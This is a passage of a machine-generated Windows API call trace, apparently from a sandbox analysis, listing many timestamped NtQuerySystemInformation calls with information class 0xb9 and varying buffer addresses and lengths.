NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0281.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0281.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0281.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0281.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0281.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0281.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0281.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0281.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0281.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0281.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0281.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x28, ResultLength=0x0) [0281.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0281.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0281.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0281.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x20, ResultLength=0x0) [0281.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0281.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0281.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0281.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0281.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x38, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0281.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x20, ResultLength=0x0) [0281.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x20, ResultLength=0x0) [0281.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x50, ResultLength=0x0) [0281.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0281.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0281.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0281.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0281.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x28, ResultLength=0x0) [0281.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x28, ResultLength=0x0) [0281.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0281.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0281.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0281.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0281.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0281.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0281.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0281.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0281.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd80, Length=0x38, ResultLength=0x0) [0281.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x20, ResultLength=0x0) [0281.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb90, Length=0x20, ResultLength=0x0) [0281.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb90, Length=0x20, ResultLength=0x0) [0281.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.498] NtQuerySystemInformation 